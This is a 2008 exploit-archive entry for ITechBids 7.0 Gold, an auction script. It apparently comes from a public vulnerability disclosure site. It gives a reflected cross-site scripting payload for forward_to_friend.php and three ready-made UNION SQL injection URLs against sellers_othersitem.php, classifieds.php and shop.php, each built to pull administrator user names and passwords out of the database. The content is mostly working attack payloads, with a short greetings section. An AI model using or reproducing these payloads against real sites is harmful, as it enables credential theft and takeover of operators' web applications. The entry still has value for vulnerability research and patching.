ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities

2008-07-13T00:00:00
ID 1337DAY-ID-3404
Type zdt
Reporter Encrypt3d.M!nd
Modified 2008-07-13T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================================
ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities
============================================================



ITechBids 7.0 Gold Multiple Remote Vulnerabilities

Website : http://www.itechscripts.com

Founded By : Encrypt3d.M!nd

NOTE:I Didn't Search The Script Well,So Maybe There is other Vulnerabilities.


# 1- Cross-site scripting (XSS):

Affected File : forward_to_friend.php

PoC :

/forward_to_friend.php?productid=<script>alert(666);</script>


# 2-Remote Sql Injection(s) :

Affected File(s) :

sellers_othersitem.php
classifieds.php
shop.php

Note:There is Other Files Affected But I Couldn't Exploit Them :(

PoC:

/sellers_othersitem.php?seller_id=666666+union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+admin

/classifieds.php?productid=666666+union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+admin

/shop.php?id=666666+union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+admin


# Greetz:

MY Sweet,L!0N,EL Mariachi,-=MizO=-(:-L),Shadow Administrator,
KoRn The Dog,Mini-Spider,All My Friends


The EnD :D


#  0day.today [2018-03-12]  #